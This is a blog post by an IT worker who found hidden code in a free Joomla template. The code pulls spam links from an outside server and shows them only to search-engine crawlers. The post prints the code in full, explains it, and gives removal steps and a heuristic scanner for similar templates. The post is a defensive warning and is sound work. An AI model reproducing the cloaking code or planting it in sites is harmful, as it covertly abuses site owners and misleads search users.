I took a job about a year ago with an equipment dealership as their IT support person. My job basically consists of handling any computer-related issues they may have such as software & hardware installations and upgrades, network administration, security, you name it. One of the other things I was put in charge of was their website. I had some experience with website development prior to coming on board but I had never really been a bona fide webmaster before where I actually got paid for doing it. So I set up a new hosting account with Dreamhost and I played around with Drupal and Joomla to kind of figure out which one I wanted to go with. I selected Joomla because I had the most experience with it and I found more templates for it that I liked. I finally settled on a template called Liberty from this website, http://joomlatemplates.me/. It was a free template but I liked the looks of it and thought I could make a pretty decent-looking site from it.

Well, things were going along fine and the site was getting tweaked and improved over time when one day I saw these links appear at the base of the home page during one of my many times of checking things over. They looked like Italian words to me so I did a Google search for them and discovered lots of websites with those exact same words. I started clicking links to look at the sites and every single one of them was using the same template as me. My first thoughts were that the template had some vulnerability in the code somewhere that someone had taken advantage of and I contacted the template developer about my situation only to never hear back from them. Finally, I tracked down where my problem was coming from and it looks like it was built right into the template by the author. I went back to his website and checked some of the other templates he had and they all had the same code inserted into the files. So I don’t know if this was deliberate or if his site was compromised but I certainly couldn’t have spam links showing up on our business site. My goal is to develop our own Joomla template for the next site update which is probably going to come sooner than I had originally planned, but the fix for my current problem was fairly easy.

First, start with the index.php file in the template's root directory and remove the line referencing template.php. In my template it was under the #comp-wrap div section.

<code>

<div id="comp-wrap"> 
 <jdoc:include type="message" />
 <jdoc:include type="component" />
 <?php include "html/template.php"; ?> 
 </div>

</code>

Then under the html directory remove the files template.php and mods.php. That’s it.

This is the code from the template.php file:

<code>

<?php
ini_set('display_errors',0);
$path = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$path = str_replace("&", "",$path);
$target = dirname(__FILE__) . DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/me3.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) { 
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
$uagent = $_SERVER['HTTP_USER_AGENT'];
foreach ($spiders as $spider){if (preg_match("/$spider/",$uagent)){echo $credits;}}
?>

</code>

What the above code does is grab the page URL and pass it as a random generator seed to the website psdu.net to retrieve new spam links. It then checks if mods.php has been changed in the last 24 hours and, if not, writes the new spam links to mods.php. Then it waits for one of the search bots to show up to index the site and it plugs in the links so they will be indexed with the page. If the website’s cache is set to clear at a certain interval like mine is, then the links would be cleared away, making it really hard to catch them. If the guy was really smart he would have checked the background color of the div section and made the link text the same color. Then the links would have been invisible to the observer while they were still being published on the page. If he had done that, I probably never would have caught this at all!
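To check other templates for the same pattern, here is a small scanner, added as an example and not part of the original template or post. It flags PHP files that combine the traits of template.php above; the regexes are heuristics, and the sample tree and the `remote.example` host are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Traits of the template.php shown above; each regex is a heuristic, not a signature.
TRAITS = {
    "reads User-Agent": re.compile(r"HTTP_USER_AGENT"),
    "names search crawlers": re.compile(r"Googlebot|msnbot|bingbot", re.I),
    "hard-coded remote URL": re.compile(r"['\"]https?://[^'\"]+['\"]"),
    "writes a local file": re.compile(r"\bfile_put_contents\s*\("),
    "hides PHP errors": re.compile(r"ini_set\s*\(\s*['\"]display_errors['\"]\s*,\s*0"),
}

def scan_file(path):
    """Return the sorted list of trait names found in one PHP file."""
    text = Path(path).read_text(errors="replace")
    return sorted(name for name, rx in TRAITS.items() if rx.search(text))

def is_suspicious(traits):
    """Flag crawler-only output, or remote content cached to disk."""
    cloaking = {"reads User-Agent", "names search crawlers"} <= set(traits)
    dropper = {"hard-coded remote URL", "writes a local file"} <= set(traits)
    return cloaking or dropper

def scan_templates(root):
    """Walk a templates directory; map each suspicious .php file to its traits."""
    hits = {}
    for php in sorted(Path(root).rglob("*.php")):
        traits = scan_file(php)
        if is_suspicious(traits):
            hits[str(php.relative_to(root))] = traits
    return hits

def build_sample(root):
    """Constructed sample tree: one clean file, one file with the traits above."""
    html = Path(root) / "liberty" / "html"
    html.mkdir(parents=True)
    (html.parent / "index.php").write_text('<?php defined("_JEXEC") or die; ?>\n')
    (html / "template.php").write_text(
        "<?php ini_set('display_errors',0);\n"
        "$source = 'http://remote.example/feed.php?i='.$_SERVER['HTTP_HOST'];\n"
        "file_put_contents('mods.php', file_get_contents($source));\n"
        "if (preg_match('/Googlebot/', $_SERVER['HTTP_USER_AGENT'])) { echo 1; }\n"
    )

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for name, traits in scan_templates(tmp).items():
            print(name, "->", ", ".join(traits))
```

Point `scan_templates()` at your site's templates directory and review each hit by hand, since legitimate extensions can also read the user agent or contain URLs.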

My aim here is to give a heads up to anyone else using this guy's templates, certainly not to teach anyone how to publish spam links in secret code. I myself take the trust placed in me with people's computers and data very seriously and I would hope that others in my field would too, but that’s unfortunately not the case. I just hope this helps someone else who may be searching just like I was for an answer to what was going on with my website.

Cheers!